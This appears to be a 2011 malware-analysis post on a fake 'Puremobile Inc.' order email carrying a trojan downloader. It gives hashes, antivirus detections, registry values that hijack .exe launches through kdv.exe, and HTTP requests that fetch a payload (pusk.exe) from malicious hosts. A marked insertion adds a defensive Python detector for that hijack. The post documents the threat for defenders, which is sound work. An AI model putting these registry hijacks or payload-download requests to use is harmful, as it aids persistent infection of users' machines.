Malware: Your Order No 218538 – Puremobile Inc.

Suspicious email spreading malware:

Received: from 18714128077.user.veloxzone.com.br (unknown [187.14.128.77]) 
Received: from [132.75.231.74] (helo=qnmekzdssguat.bacphgvlbnez.ua)
From: "Puremobile Inc." <h5923a@ms2.hinet.net>
Subject: Your Order No 218538 - Puremobile Inc.

Message:

Thank you for ordering from Puremobile Inc.
 
This message is to inform you that your order has been received and is currently
being processed.
 
Your order reference is 372662.
 
You will need this in all correspondence.
This receipt is NOT proof of purchase.
We will send a printed invoice by mail to your billing address.
 
You have chosen to pay by credit card.
Your card will be charged for the amount of 045.00 USD and "Puremobile Inc." will
appear next to the charge on your statement.
Your purchase information appears below in the file.

The attachment is a file with a ZIP extension:

Report date: 2011-05-01 23:21:48 (GMT 1)
File name: payment-document-zip
File size: 7627 bytes
MD5 hash: d85180f7a74e04c9b9ef6f9bd437194d
SHA1 hash: 79763a8766773bc08f7dd309db2488f46d3f5438
Detection rate: 3 on 6 (50%)
Status: INFECTED

AVG 01/05/2011 10.0.0.1190 FakeAlert
Avira AntiVir 01/05/2011 7.11.7.12 TR/Dldr.FraudLoad.zemh
Emsisoft 01/05/2011 5.1.0.2 Trojan-Downloader.Win32.Chepvil!IK

The extracted file is an executable file:

Report date: 2011-05-01 23:21:48 (GMT 1)
File name: payment-document-exe
File size: 18432 bytes
MD5 hash: 694a38aa76e06cebe4048260b8f0e4fa
SHA1 hash: 0e698c044e77e11e2c494ad0b2dc002f6d73dabe
Detection rate: 2 on 6 (50%)
Status: INFECTED

Avira AntiVir 01/05/2011 7.11.7.12 TR/Dldr.FraudLoad.zemh
Emsisoft 01/05/2011 5.1.0.2 Trojan-Downloader.Win32.Chepvil!IK

The malware creates the following files:

%AppData%\kdv.exe (BE39D725BDA9A76EAB2E0F1B3FAD8FA3)

Registry entries added:

HKCU\Software\Classes\.exe\shell\open\command:
(Default) = ""%AppData%\kdv.exe" -a "%1" %*"
 
HKCU\Software\Classes\exefile\shell\open\command:
(Default) = ""%AppData%\kdv.exe" -a "%1" %*"
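The two registry values above hijack the .exe file association, so every program the user launches is first routed through kdv.exe. As an added example (not code from the original post), the following defender-side check parses a constructed .reg export that mirrors those entries plus one clean control key, and flags any .exe/exefile open command that is not Windows' stock "%1" %*. The sample export, key names and the helper names are assumptions made for this illustration.

```python
import re

# Constructed .reg export fragment (not from a real system). The first two
# keys reproduce the values the post reports for kdv.exe; the third is a
# clean control entry with the stock Windows command.
SAMPLE_REG_EXPORT = r'''Windows Registry Editor Version 5.00

[HKEY_CURRENT_USER\Software\Classes\.exe\shell\open\command]
@="\"%AppData%\\kdv.exe\" -a \"%1\" %*"

[HKEY_CURRENT_USER\Software\Classes\exefile\shell\open\command]
@="\"%AppData%\\kdv.exe\" -a \"%1\" %*"

[HKEY_CLASSES_ROOT\exefile\shell\open\command]
@="\"%1\" %*"
'''

# Stock value for launching an executable: the file itself plus its
# arguments, with nothing placed in front of it.
EXPECTED_EXE_COMMAND = '"%1" %*'

KEY_RE = re.compile(r'^\[(.+)\]$')
DEFAULT_VALUE_RE = re.compile(r'^@="(.*)"$')
# Only the .exe extension key and the exefile ProgID define how .exe runs.
EXE_KEY_RE = re.compile(r'\\(\.exe|exefile)\\shell\\open\\command$', re.IGNORECASE)


def parse_reg_export(text):
    """Return {key_path: default_value} for keys that set a (Default) string."""
    result, current = {}, None
    for line in text.splitlines():
        m = KEY_RE.match(line)
        if m:
            current = m.group(1)
            continue
        m = DEFAULT_VALUE_RE.match(line)
        if m and current:
            # .reg files escape backslashes and double quotes inside string data
            result[current] = m.group(1).replace('\\\\', '\\').replace('\\"', '"')
    return result


def find_exe_association_hijacks(text):
    """List (key, value) pairs whose .exe open command differs from the stock one."""
    hits = []
    for key, value in parse_reg_export(text).items():
        if EXE_KEY_RE.search(key) and value.strip() != EXPECTED_EXE_COMMAND:
            hits.append((key, value))
    return hits


if __name__ == '__main__':
    for key, value in find_exe_association_hijacks(SAMPLE_REG_EXPORT):
        print(f'HIJACKED: {key} -> {value}')
```

On a live host the same comparison can be run against the output of reg export for HKCU\Software\Classes and HKLM\Software\Classes; a per-user override of the exefile command is a strong indicator on its own, since Windows does not set one by default.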

Network traffic:

GET /0014000126 HTTP/1.1
Host: hahecekis. com
 
GET /pusk.exe HTTP/1.1
Host: variantov. com
 
GET /f/g.php HTTP/1.1
Host: kkojjors. net

URLVoid domain analysis:

http://www.urlvoid.com/scan/hahecekis.net
http://www.urlvoid.com/scan/variantov.com
http://www.urlvoid.com/scan/kkojjors.net